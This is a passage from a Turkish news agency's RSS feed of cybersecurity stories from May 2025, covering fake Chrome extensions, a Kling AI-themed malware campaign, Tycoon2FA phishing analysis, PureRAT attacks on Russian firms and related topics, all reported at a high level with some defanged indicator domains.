<p data-start="1461" data-end="1804"><strong data-start="1461" data-end="1500">Apple’dan alınması gereken önlemler</strong><br data-start="1500" data-end="1503">Apple, bu güvenlik risklerini azaltmak amacıyla kullanıcıların cihazlarını acilen en son iOS sürümüne güncellemelerini ve AirPlay özelliğini devre dışı bırakmalarını öneriyor. Ayrıca, AirPlay üzerinden yalnızca güvenilir kişilerden dosya alınması da önemli bir güvenlik adımı olarak değerlendiriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Suudi Arabistan’da Siber Güvenlik Eğitimine Yeni Dönem: INE Security ile Abadnet İş Birliği Başladı</title>
            <link>https://cumha.com.tr/suudi-arabistanda-siber-guvenlik-egitimine-yeni-doenem-ine-security-ile-abadnet-is-birligi-basladi</link>
            <guid>https://cumha.com.tr/suudi-arabistanda-siber-guvenlik-egitimine-yeni-doenem-ine-security-ile-abadnet-is-birligi-basladi</guid>
            <description><![CDATA[ Siber güvenlik alanında küresel liderlerden INE Security, Suudi Arabistan merkezli Abadnet Institute ile kapsamlı bir eğitim ortaklığına imza attı. Ortaklık sayesinde bölgedeki öğrencilere uluslararası akredite, uygulamalı siber güvenlik eğitimleri sunulacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f08553c583.webp" length="36988" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:50:19 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>INE Security ve Abadnet iş birliği neleri kapsıyor, Suudi Arabistanda kaç öğrenci bu programdan yararlanacak, eJPT eğitimi nedir, Abadnet Institute hangi sertifikaları veriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="411" data-end="414">Cary, Kuzey Karolina merkezli siber güvenlik eğitim firması INE Security, Riyad'da faaliyet gösteren Abadnet Institute for Training ile stratejik bir ortaklık kurduğunu duyurdu. İş birliği, INE Security'nin dünya çapında tanınan eğitim materyalleri ile Abadnet'in bölgesel uzmanlığını bir araya getirerek Suudi Arabistan ve çevresinde nitelikli siber güvenlik profesyonelleri yetiştirmeyi hedefliyor.</p>
<p></p>
<p data-start="816" data-end="1287"><strong data-start="816" data-end="860">Uluslararası akredite eğitim programları</strong><br data-start="860" data-end="863">2007 yılında kurulan Abadnet Institute, yıllık 10.000'den fazla öğrenciye hizmet veren, uluslararası akredite programlarıyla dikkat çeken bir eğitim kuruluşu. Ortaklık kapsamında INE Security, Abadnet’in eğitim kamplarını Junior Penetration Tester (eJPT) içeriği, uygulamalı laboratuvarlar ve CompTIA Security+ gibi sertifika hazırlıkları ile destekliyor. Bu sayede öğrencilere hem teorik hem de uygulamalı eğitim sunulacak.</p>
<p data-start="1289" data-end="1737"><strong data-start="1289" data-end="1318">İlk akademi tamamen doldu</strong><br data-start="1318" data-end="1321">Yeni iş birliği, 200 öğrencilik ilk akademiyle başladı ve tüm lisans kontenjanları tamamen doldu. INE Security Baş Gelir Sorumlusu Brett Erskine, yapılan açıklamada şu ifadeleri kullandı: ‘Suudi Arabistan ve GCC bölgesinde güçlü bir üne sahip olan Abadnet ile çalışmaktan heyecan duyuyoruz. Bu ortaklık, öğrencilere pratik beceriler ve sektörel sertifikalar sunarak kariyerlerinde önemli bir sıçrama imkanı veriyor.’</p>
<p data-start="1739" data-end="2240"><strong data-start="1739" data-end="1797">Abadnet, INE içerikleriyle eğitim kalitesini artırıyor</strong><br data-start="1797" data-end="1800">Abadnet Institute Operasyon Direktörü Ahmed Alkathiri, INE Security’nin içerik kalitesine dikkat çekerek şunları söyledi: ‘INE’nin eğitim materyalleri kariyerim boyunca bana büyük katkı sağladı. Bu ortaklık sayesinde öğrencilerimize en ileri düzeyde eğitim verebilme kapasitemizi artırıyoruz.’ Abadnet Siber Güvenlik Bölüm Başkanı Ahmed Fatouh ise, INE içeriklerinin eğitim müfredatına entegre edilmesinin önemli bir adım olduğunu belirtti.</p>
<p data-start="2242" data-end="2577"><strong data-start="2242" data-end="2268">Gelecek odaklı yatırım</strong><br data-start="2268" data-end="2271">Bu iş birliği, INE Security’nin bölgedeki dijital istihdam ekosistemini güçlendirme ve yüksek nitelikli siber güvenlik uzmanları yetiştirme hedefinin bir parçası olarak değerlendiriliyor. Ortaklık sayesinde, penetrasyon testi ve etik hackleme gibi alanlarda işe hazır yetenekler geliştirilmesi amaçlanıyor.</p>
<p data-start="2579" data-end="2774"><strong data-start="2579" data-end="2591"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Çin menşeli güneş panellerinde gizli donanım şüphesi: ABD'de casusluk alarmı</title>
            <link>https://cumha.com.tr/cin-menseli-gunes-panellerinde-gizli-donanim-suphesi-abdde-casusluk-alarmi</link>
            <guid>https://cumha.com.tr/cin-menseli-gunes-panellerinde-gizli-donanim-suphesi-abdde-casusluk-alarmi</guid>
            <description><![CDATA[ ABD’de kullanılan bazı Çin yapımı güneş enerjisi ekipmanlarında gizlenmiş iletişim aygıtları tespit edildi. Bu parçaların sistemleri uzaktan kontrol etme amacıyla yerleştirilmiş olabileceği iddiası, enerji güvenliği açısından ciddi endişelere yol açtı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0e45a4951.webp" length="54266" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:45:26 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Çinli güneş paneli üreticileri hangi sistemleri etkiliyor, gizli iletişim donanımları ne amaçla yerleştiriliyor, ABD güvenlik güçleri olaya nasıl yaklaşıyor, Çin yönetimi iddialara ne yanıt verdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="381" data-end="384"><strong data-start="384" data-end="424">Güneş enerjisinde gizli risk iddiası</strong><br data-start="424" data-end="427">Küresel çapta temiz enerjiye geçiş hız kazanırken, ABD ile Çin arasında teknoloji temelli yeni bir güvenlik krizi gündeme geldi. Reuters’ın yayımladığı kapsamlı araştırma, ABD’de kullanılan bazı güneş enerjisi sistemlerinde belgelenmemiş iletişim aygıtları bulunduğunu ortaya koydu. Bu cihazların, Çinli üreticiler tarafından sistemlere kasıtlı olarak yerleştirilmiş olabileceği ileri sürüldü.</p>
<p></p>
<p data-start="822" data-end="1243"><strong data-start="822" data-end="878">Sistemlere entegre edilen gizli iletişim donanımları</strong><br data-start="878" data-end="881">İddialara göre, Çin menşeli bazı güneş invertörleri ve batarya sistemlerinde hücresel iletişim donanımları yer aldı. Bu sistemler, enerjiyi şebekeye aktaran ve depolayan temel ekipmanlar arasında yer alıyor. Uzmanlara göre, bu donanımlar kötü niyetli kişiler tarafından uzaktan devre dışı bırakılabilir ve bu da geniş çaplı elektrik kesintilerine neden olabilir.</p>
<p data-start="1245" data-end="1535"><strong data-start="1245" data-end="1302">Kasım 2024’te sinyal müdahalesi yaşandığı öne sürüldü</strong><br data-start="1302" data-end="1305">Reuters’ın haberinde, Kasım 2024’te bazı invertörlerin Çin'den gelen sinyallerle uzaktan kapatıldığı vakalar bildirildi. Vakaların tüm etkisi henüz netleşmese de, yetkililer arasında ciddi güvenlik endişeleri doğurduğu belirtildi.</p>
<p data-start="1537" data-end="1907"><strong data-start="1537" data-end="1574">Belgelerde yer almayan bileşenler</strong><br data-start="1574" data-end="1577">Güneş sistemlerinde uzaktan erişim ve performans izleme için iletişim modülleri standart hale gelmiş durumda. Ancak uzmanların dikkat çektiği nokta, bu bileşenlerin hiçbir teknik belgede belirtilmemiş olması. Bu durum, sistemlerin siber güvenlik önlemlerine entegre edilmemesine ve dış müdahalelere açık hale gelmesine yol açıyor.</p>
<p data-start="1909" data-end="2165"><strong data-start="1909" data-end="1942">ABD Enerji Bakanlığı uyarıyor</strong><br data-start="1942" data-end="1945">ABD Enerji Bakanlığı sözcüsü, “Bu işlevsellik kötü niyetli olmayabilir, ancak satın alanların ürünlerin tam özelliklerini bilmesi gerekir” diyerek, belgelenmemiş donanımların güvenlik açıkları oluşturduğuna dikkat çekti.</p>
<p data-start="2167" data-end="2449"><strong data-start="2167" data-end="2195">Çin iddiaları reddediyor</strong><br data-start="2195" data-end="2198">Olayda adı geçen Çinli firmaların sayısı netleşmezken, Çin’in Washington Büyükelçiliği iddiaları reddetti. Yapılan açıklamada, ‘ulusal güvenlik kavramının genelleştirilmesine ve Çin’in teknoloji başarılarının karalanmasına’ karşı çıkıldığı belirtildi.</p>
<p data-start="2451" data-end="2782"><strong data-start="2451" data-end="2494">ABD’de Çin menşeli ekipman oranı yüksek</strong><br data-start="2494" data-end="2497">Enerji danışmanlığı şirketi Wood Mackenzie’nin verilerine göre, dünyadaki güneş invertörlerinin yüzde 78’i Çin üretimi. ABD’deki güneş paneli üretim kapasitesinin yüzde 39’u da Çinli firmalara ait. Bu durum, ABD enerji altyapısının Çin’e olan yüksek bağımlılığını gözler önüne seriyor.</p>
<p data-start="2784" data-end="2996"><strong data-start="2784" data-end="2796"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Chrome Mağazasında Tespit Edilen 100'den Fazla Sahte Uzantı Oturumları Ele Geçiriyor</title>
            <link>https://cumha.com.tr/chrome-magazasinda-tespit-edilen-100den-fazla-sahte-uzanti-oturumlari-ele-geciriyor</link>
            <guid>https://cumha.com.tr/chrome-magazasinda-tespit-edilen-100den-fazla-sahte-uzanti-oturumlari-ele-geciriyor</guid>
            <description><![CDATA[ Şubat 2024&#039;ten bu yana tespit edilen 100&#039;den fazla sahte Chrome uzantısı, kullanıcıların oturumlarını ele geçiriyor, kimlik bilgilerini çalıyor ve tarayıcılara reklam enjekte ediyor. Uzantılar meşru hizmetleri taklit ederek kullanıcıları kandırıyor ve güvenlik açıklarından faydalanarak zararlı işlemler yürütüyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0de6ded00.webp" length="10126" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:43:52 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Sahte Chrome uzantıları nasıl çalışıyor, hangi hizmetler taklit ediliyor, kullanıcılar nasıl korunabilir, Google hangi önlemleri aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="437" data-end="874"><strong data-start="458" data-end="513">Sahte Chrome uzantıları kullanıcıları tehdit ediyor</strong><br data-start="513" data-end="516">DomainTools Intelligence (DTI) ekibinin tespitlerine göre, Şubat 2024'ten bu yana Chrome Web Mağazası’nda görünüşte zararsız gibi görünen ancak arka planda ciddi güvenlik riskleri barındıran çok sayıda uzantı yayınlandı. Bu uzantılar, kullanıcıların oturum bilgilerini ele geçiriyor, çerezleri topluyor ve tarayıcılar üzerinden kötü amaçlı reklamlar yayıyor.</p>
<p data-start="876" data-end="1238"><strong data-start="876" data-end="923">Kötü niyetli uzantılar aşırı izinler alıyor</strong><br data-start="923" data-end="926">Kötü amaçlı eklentiler, manifest.json dosyaları aracılığıyla kendilerine geniş kapsamlı izinler tanıyor. Bu sayede tarayıcıda ziyaret edilen her siteyle etkileşim kurabiliyor, saldırganın kontrolündeki etki alanlarından zararlı komutlar alıp çalıştırabiliyor ve kullanıcıyı istenmeyen sitelere yönlendirebiliyor.</p>
<p data-start="1240" data-end="1661"><strong data-start="1240" data-end="1287">Meşru hizmetleri taklit ederek yayılıyorlar</strong><br data-start="1287" data-end="1290">Uzantıların dağıtımı, DeepSeek, Manus, DeBank, FortiVPN ve Site Stats gibi bilinen hizmetleri taklit eden sahte web siteleri üzerinden gerçekleştiriliyor. Bu siteler, kullanıcılara sahte uzantıları yükletmek için meşruymuş gibi tasarlanıyor. Uzantılar ayrıca, DOM üzerindeki "onreset" olay işleyicisi aracılığıyla içerik güvenlik politikalarını (CSP) atlatmaya çalışıyor.</p>
<p data-start="1663" data-end="2004"><strong data-start="1663" data-end="1708">Facebook araçları da kullanılmış olabilir</strong><br data-start="1708" data-end="1711">DTI ekibi, saldırganların kullanıcıları sahte uzantılara yönlendirmek için sosyal medya platformlarını da kullandığını düşünüyor. Bazı sahte sitelerin Facebook izleme kimlikleri içerdiği ve kullanıcı çekmek amacıyla Facebook sayfaları, grupları ve reklamlarının kullanıldığı değerlendiriliyor.</p>
<p data-start="2006" data-end="2372"><strong data-start="2006" data-end="2054">Google harekete geçti, kullanıcılar uyarıldı</strong><br data-start="2054" data-end="2057">Tespit edilen kötü amaçlı uzantılar, Google tarafından Chrome Web Mağazası’ndan kaldırıldı. Ancak uzmanlar, kullanıcıların hâlâ dikkatli olmaları gerektiğini belirtiyor. Uzantı yüklemeden önce geliştiricilerin doğrulanması, izinlerin kontrol edilmesi ve kullanıcı yorumlarının dikkatle incelenmesi tavsiye ediliyor.</p>
<p data-start="2374" data-end="2706"><strong data-start="2374" data-end="2409">Manipülasyon riski devam ediyor</strong><br data-start="2409" data-end="2412">DomainTools'un bulgularına göre, bazı uzantılar kullanıcı puanlamalarını manipüle etmek amacıyla düşük puan veren kullanıcıları özel geri bildirim formlarına yönlendirirken, yüksek puan verenleri doğrudan Chrome Mağazası'na yönlendiriyor. Bu da, değerlendirmelerin güvenilirliğini sorgulatıyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Mobil Kullanıcıları Hedef Alan Sahte PWA Yönlendirmesiyle Yetişkin İçerikli Dolandırıcılık Tespit Edildi</title>
            <link>https://cumha.com.tr/mobil-kullanicilari-hedef-alan-sahte-pwa-yoenlendirmesiyle-yetiskin-icerikli-dolandiricilik-tespit-edildi</link>
            <guid>https://cumha.com.tr/mobil-kullanicilari-hedef-alan-sahte-pwa-yoenlendirmesiyle-yetiskin-icerikli-dolandiricilik-tespit-edildi</guid>
            <description><![CDATA[ Siber güvenlik araştırmacıları, mobil cihaz kullanıcılarını sahte uygulama mağazalarına yönlendiren kötü amaçlı JavaScript enjeksiyonları içeren yeni bir dolandırıcılık kampanyasını ortaya çıkardı. Saldırı, özellikle mobil tarayıcılarda çalışan sahte bir İleri Web Uygulaması (PWA) ile gerçekleştiriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0d952277c.webp" length="70424" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:42:26 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>PWA dolandırıcılığı nasıl çalışıyor, saldırılar hangi cihazları hedef alıyor, yönlendirme hangi yöntemle yapılıyor, kullanıcılar nasıl korunabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="462" data-end="465"><strong data-start="465" data-end="527">Mobil kullanıcıları hedefleyen yeni dolandırıcılık yöntemi</strong><br data-start="527" data-end="530">Siber güvenlik uzmanları, mobil cihazlarda site ziyaretçilerini yetişkin içerikli dolandırıcılık sitelerine yönlendirmek amacıyla kullanılan kötü amaçlı JavaScript enjeksiyonları içeren yeni bir siber saldırı kampanyasını ortaya çıkardı.</p>
<p></p>
<p data-start="770" data-end="1053">c/side araştırmacısı Himanshu Anand tarafından Salı günü yayımlanan analizde, saldırının dikkat çeken yönünün kullanılan teslimat yöntemi olduğu belirtildi. Anand, 'Yükün kendisi yeni bir şey değil (bir başka yetişkin kumar dolandırıcılığı), ancak teslimat yöntemi öne çıkıyor' dedi.</p>
<p data-start="1055" data-end="1467"><strong data-start="1055" data-end="1114">Tam işlevli PWA ile sahte uygulama mağazası simülasyonu</strong><br data-start="1114" data-end="1117">Saldırıda kullanılan kötü amaçlı açılış sayfasının, tam teşekküllü bir İleri Web Uygulaması (PWA) olduğu ve kullanıcıların daha uzun süre etkileşimde kalmasını sağlamak ile temel tarayıcı korumalarını aşmayı hedeflediği ifade edildi. Bu yöntemle saldırganlar, mobil cihaz kullanıcılarını tespit ederek özel olarak mobil odaklı bir saldırı düzenliyor.</p>
<p data-start="1469" data-end="1884"><strong data-start="1469" data-end="1518">Yalnızca mobilde çalışan JavaScript saldırısı</strong><br data-start="1518" data-end="1521">Kampanya, yalnızca mobil cihazlarda tetiklenen istemci tarafı JavaScript saldırısı olarak tanımlandı. JavaScript kodu, belirli web sitelerine enjekte edilerek çalışıyor ve Android, iOS ve iPadOS kullanıcılarını yönlendirme sayfalarına taşıyor. Bu yönlendirme sayfaları, kullanıcıları yetişkin içerikli sahte uygulamaların reklamını yapan bağlantılara ulaştırıyor.</p>
<p data-start="1886" data-end="2316"><strong data-start="1886" data-end="1942">PWA’lar yeni kimlik avı stratejilerinde kullanılıyor</strong><br data-start="1942" data-end="1945">PWA’lar, web teknolojileri kullanılarak geliştirilen ve kullanıcıya yerel uygulama benzeri bir deneyim sunan yapılar olmaları nedeniyle saldırganlar için cazip hale geliyor. Anand, 'PWA'ların kullanımı, saldırganların daha kalıcı kimlik avı yöntemlerini denediğini gösteriyor. Sadece mobil odaklı olmaları, birçok tespit mekanizmasından kaçmalarına olanak sağlıyor' dedi.</p>
<p data-start="2318" data-end="2481"><strong data-start="2318" data-end="2330"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sahte Kling AI Reklamları Facebook’ta 22 Milyon Kişiyi Hedef Alan Zararlı Yazılım Dağıttı</title>
            <link>https://cumha.com.tr/sahte-kling-ai-reklamlari-facebookta-22-milyon-kisiyi-hedef-alan-zararli-yazilim-dagitti</link>
            <guid>https://cumha.com.tr/sahte-kling-ai-reklamlari-facebookta-22-milyon-kisiyi-hedef-alan-zararli-yazilim-dagitti</guid>
            <description><![CDATA[ Facebook&#039;ta sahte Kling AI temalı sponsorlu reklamlarla yayılan yeni bir siber saldırı kampanyası, kullanıcıları sahte web sitelerine yönlendirerek uzaktan erişim Truva Atı (RAT) yüklemelerine neden oldu. Kampanya, 22 milyondan fazla potansiyel kurbanı hedef aldı ve Vietnam bağlantılı siber suçlularla ilişkilendiriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0d65cc7f3.webp" length="31100" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:41:38 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Sahte Kling AI reklamları nasıl çalışıyor, PureHVNC RAT nedir, Facebook üzerindeki zararlı yazılım kampanyası kimlerle bağlantılı, bu saldırıdan kimler etkileniyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="464" data-end="467"><strong data-start="467" data-end="521">Facebook'ta sahte reklamlarla yayılan siber tehdit</strong><br data-start="521" data-end="524">Sosyal medya platformu Facebook, sahte Kling AI temalı sponsorlu reklamlarla başlatılan geniş çaplı bir siber saldırı kampanyasına sahne oldu. Sahte Facebook sayfaları ve yanıltıcı içeriklerle oluşturulan reklamlar, kullanıcıları Kling AI gibi görünen sahte internet sitelerine yönlendirdi. Bu sahte sitelerde kurbanlara görüntü veya video üretme vaadiyle kötü amaçlı yazılım yüklemeleri sağlandı.</p>
<p></p>
<p data-start="923" data-end="1491"><strong data-start="923" data-end="971">Kling AI üzerinden yapılan kimlik hırsızlığı</strong><br data-start="971" data-end="974">Gerçekte Çin merkezli Kuaishou Technology tarafından geliştirilen Kling AI, yapay zeka destekli bir içerik üretim platformudur ve 2025 itibarıyla 22 milyondan fazla kullanıcıya sahiptir. Ancak saldırganlar, bu popülerliğin arkasına saklanarak Kling AI'yı taklit eden sahte web siteleri (örneğin <em data-start="1269" data-end="1289">klingaimedia[.]com</em>, <em data-start="1291" data-end="1312">klingaistudio[.]com</em>) kurdu. Bu siteler, kullanıcılara dosya indirmelerini önerdi. İndirilen dosyalar, içinde uzaktan erişim Truva Atı (RAT) ve bilgi hırsızlarını barındıran ZIP arşivleri içeriyordu.</p>
<p data-start="1493" data-end="1987"><strong data-start="1493" data-end="1532">PureHVNC RAT ile sistemlere sızıldı</strong><br data-start="1532" data-end="1535">Check Point'in tespitine göre, kurbanların bilgisayarlarına indirilen yükleyici dosyalar, çeşitli güvenlik analiz araçlarını algılayabiliyor ve Windows Kayıt Defteri üzerinde değişiklik yaparak sistemde kalıcılığını sağlıyor. Ayrıca meşru sistem süreçlerine sızarak, PureHVNC RAT adlı ikinci aşama zararlı yazılımı aktive ediyor. Bu yazılım, tarayıcı verilerini, kripto cüzdan bilgilerini ve ekran görüntülerini hedef alarak hassas verileri sızdırıyor.</p>
<p data-start="1989" data-end="2423"><strong data-start="1989" data-end="2036">Vietnam bağlantısı ve yaygınlaşan taktikler</strong><br data-start="2036" data-end="2039">Check Point araştırmacıları, sahte Kling AI sayfalarına ait en az 70 farklı tanıtım gönderisi tespit ettiklerini duyurdu. Kampanyayı yürüten kişi veya grupların kimliği netleşmemekle birlikte, deliller Vietnam merkezli siber suçlulara işaret ediyor. Bu tür grupların, daha önce de sahte yapay zeka araçları aracılığıyla kullanıcıları zararlı yazılım indirmeye teşvik ettiği biliniyor.</p>
<p data-start="2425" data-end="2872"><strong data-start="2425" data-end="2471">Sosyal medya tabanlı saldırılar yükselişte</strong><br data-start="2471" data-end="2474">The Wall Street Journal’a göre, Meta platformlarında son dönemde büyük bir dolandırıcılık artışı yaşanıyor. Facebook ve Instagram, romantik dolandırıcılıklardan sahte promosyonlara kadar çeşitli siber suçlara ev sahipliği yapıyor. Ayrıca, Telegram ve benzeri platformlar üzerinden yayılan sahte iş ilanları, genç bireyleri Güneydoğu Asya’daki dolandırıcılık ağlarına yönlendirmek için kullanılıyor.</p>
<p data-start="2874" data-end="3054"><strong data-start="2874" data-end="2886"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kurumsal Ağlara Sessizce Sızan Yeni Tehdit: 'Tycoon2FA' ile Gelişmiş Kimlik Avı Saldırıları Nasıl Tespit Edilir?</title>
            <link>https://cumha.com.tr/kurumsal-aglara-sessizce-sizan-yeni-tehdit-tycoon2fa-ile-gelismis-kimlik-avi-saldirilari-nasil-tespit-edilir</link>
            <guid>https://cumha.com.tr/kurumsal-aglara-sessizce-sizan-yeni-tehdit-tycoon2fa-ile-gelismis-kimlik-avi-saldirilari-nasil-tespit-edilir</guid>
            <description><![CDATA[ Tek bir e-posta ile tüm ağı ele geçirebilen yeni nesil kimlik avı saldırıları, artık otomatik çözümlerle yakalanamıyor. Tycoon2FA örneği üzerinden, saldırı zincirinin tamamının nasıl açığa çıkarılabileceği ve SOC ekiplerinin bu saldırılara karşı saniyeler içinde nasıl önlem alabileceği adım adım anlatıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0ab7334bb.webp" length="61728" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:30:08 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Tycoon2FA nedir, kimlik avı saldırısı nasıl tespit edilir, sandbox analizi nasıl yapılır, IOC verileri nasıl toplanır ve kullanılır</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="476" data-end="882"><strong data-start="476" data-end="533">Kimlik Avı Saldırıları Neden Hâlâ Bu Kadar Tehlikeli?</strong><br data-start="533" data-end="536">Günümüzde tek bir dikkatle hazırlanmış e-posta, tüm bir sistemin güvenliğini tehlikeye atabiliyor. Kurumsal e-posta filtrelerini aşabilen bu iletiler, çalışanları kandırarak saldırganlara sistemlere erişim sağlayabiliyor. Özellikle Tycoon2FA gibi gelişmiş kimlik avı araçları, otomatik analiz çözümleriyle tespit edilmesi zor hale gelmiş durumda.</p>
<p data-start="884" data-end="1293"><strong data-start="884" data-end="941">İlk Adım: Şüpheli Ögeleri Sandbox Ortamında İncelemek</strong><br data-start="941" data-end="944">SOC (Güvenlik Operasyon Merkezi) ekipleri, şüpheli dosya veya URL’leri ANY.RUN gibi etkileşimli sanal alan ortamlarına yükleyerek analiz gerçekleştirebiliyor. Bu tür sanal makineler, dosyaların açılmasını, bağlantıların tıklanmasını ve davranışların gözlemlenmesini güvenli şekilde sağlıyor. ANY.RUN, bu analizleri dakikalar içinde tamamlayabiliyor.</p>
<p data-start="1295" data-end="1781"><strong data-start="1295" data-end="1355">Gerçek Bir Örnek: Tycoon2FA E-postasıyla Yapılan Saldırı</strong><br data-start="1355" data-end="1358">Analiz edilen örnek e-posta, kullanıcıyı kandırmak amacıyla içine büyük, yeşil bir ‘Ses Çal’ butonu yerleştirilmiş bir tasarım içeriyor. Butona tıklanması, kullanıcıyı CAPTCHA’lı başka sayfalara yönlendiriyor. Bu aşamada birçok otomatik sistem devre dışı kalıyor. Ancak ANY.RUN ortamında manuel veya otomatik CAPTCHA çözümü ile analiz devam ettirilebiliyor ve nihai hedef olan sahte Microsoft giriş ekranına ulaşılabiliyor.</p>
<p data-start="1783" data-end="2172"><strong data-start="1783" data-end="1837">İkinci Adım: Tüm Saldırı Zincirini Görselleştirmek</strong><br data-start="1837" data-end="1840">Etkileşimli analiz sayesinde saldırının her aşaması detaylı şekilde izlenebiliyor. Şüpheli yönlendirmeler, kimlik avı ekranları ve kullanıcı davranışlarını taklit eden mekanizmalar açıkça gözlemlenebiliyor. Otomatik araçların kaçırabileceği ipuçları — örneğin eksik favicon, alakasız URL yapısı — manuel analizle ortaya çıkarılıyor.</p>
<p data-start="2174" data-end="2589"><strong data-start="2174" data-end="2234">Üçüncü Adım: IOC’leri Toplamak ve Güvenliği Güçlendirmek</strong><br data-start="2234" data-end="2237">Tamamlanan analiz sonrasında elde edilen IOC’ler (kompromize göstergeleri), tehdit önleme sistemlerine entegre edilebiliyor. ANY.RUN aracı, zararlı süreçleri, şüpheli ağ bağlantılarını, IP’leri ve domainleri anında işaretleyerek kapsamlı bir rapor oluşturuyor. Bu veriler hem mevcut saldırıya karşı hem de gelecekteki tehditlere karşı kullanılabiliyor.</p>
<p data-start="2591" data-end="2995"><strong data-start="2591" data-end="2645">Etkileşimli Sandbox Kullanmanın Kurumsal Faydaları</strong><br data-start="2645" data-end="2648">Etkileşimli sanal alan çözümleri, yalnızca deneyimli güvenlik ekipleri için değil, yeni başlayan analistler için de uygun bir analiz ortamı sunuyor. Eğitim, olay yanıtı, tehdit tespiti ve işbirliği açısından birçok avantaj sağlıyor. Bulut tabanlı yapısı sayesinde altyapı kurulumu gerektirmeyen sistem, her yerden analiz yapılmasına imkân tanıyor.</p>
<p data-start="2997" data-end="3262"><strong data-start="2997" data-end="3023">Özel Kampanya Duyurusu</strong><br data-start="3023" data-end="3026">ANY.RUN, 19-31 Mayıs 2025 tarihleri arasında 9. kuruluş yılını özel kampanyalarla kutluyor. Sandbox lisansları, tehdit istihbarat araçları ve eğitim laboratuvarları için geçerli tekliflerle kurumlar, analiz kapasitelerini artırabilecek.</p>
<p data-start="3264" data-end="3412"><strong data-start="3264" data-end="3276"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Rus Şirketleri Hedefte: PureRAT Zararlısı 2025'te 4 Kat Arttı, Yeni Tehdit PureLogs ile Genişliyor</title>
            <link>https://cumha.com.tr/rus-sirketleri-hedefte-purerat-zararlisi-2025te-4-kat-artti-yeni-tehdit-purelogs-ile-genisliyor</link>
            <guid>https://cumha.com.tr/rus-sirketleri-hedefte-purerat-zararlisi-2025te-4-kat-artti-yeni-tehdit-purelogs-ile-genisliyor</guid>
            <description><![CDATA[ Kaspersky&#039;nin tespitlerine göre, Rus şirketlerini hedef alan PureRAT tabanlı siber saldırılar 2025&#039;in ilk çeyreğinde geçen yıla göre dört kat arttı. PureLogs adlı bilgi hırsızı ile desteklenen saldırılar, kimlik avı e-postalarıyla başlıyor ve tam sistem kontrolüne kadar ilerliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0a7b7cbba.webp" length="75214" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:29:11 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>PureRAT nedir, saldırılar nasıl başlatılıyor, PureLogs hangi bilgileri çalabiliyor, Rus şirketleri neden hedef alınıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="436" data-end="439"><strong data-start="439" data-end="469">Kaspersky'den kritik uyarı</strong><br data-start="469" data-end="472">Siber güvenlik firması Kaspersky, Rus şirketlerini hedef alan yeni bir kimlik avı kampanyasıyla ilgili dikkat çeken bir rapor yayımladı. Rapora göre, PureRAT adlı kötü amaçlı yazılım, 2025'in ilk çeyreğinde, 2024'ün aynı dönemine kıyasla dört kat daha fazla saldırıda kullanıldı.</p>
<p></p>
<p data-start="755" data-end="1140"><strong data-start="755" data-end="791">Saldırı zinciri nasıl ilerliyor?</strong><br data-start="791" data-end="794">Kampanya, kullanıcılara gönderilen bir e-postada, RAR arşivi gibi görünen ve çift uzantı taşıyan ("doc_054_[düzenlendi].pdf.rar") dosyalarla başlıyor. Arşiv dosyasının içindeki zararlı yazılım, çalıştırıldığında kendisini Windows sistem dizinine 'task.exe' adıyla kopyalıyor ve otomatik çalıştırma için 'Task.vbs' adında bir script oluşturuyor.</p>
